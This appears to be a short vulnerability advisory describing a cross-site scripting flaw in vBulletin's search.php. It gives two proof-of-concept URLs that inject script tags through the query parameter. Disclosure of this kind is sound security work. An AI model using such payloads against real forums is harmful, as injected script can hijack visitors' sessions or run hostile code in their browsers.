JelSoft VBulletin Search.PHP Cross-Site Scripting Vulnerability

info
discussion
exploit
solution
references

JelSoft VBulletin Search.PHP Cross-Site Scripting Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

http://www.example.com/forum/search.php?do=process&showposts=0&query=</p></p></blockquote>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<script>alert('XSS')</script><plaintext>

http://www.example.com/forum/search.php?do=process&showposts=0&query=<script>alert('XSS')</script>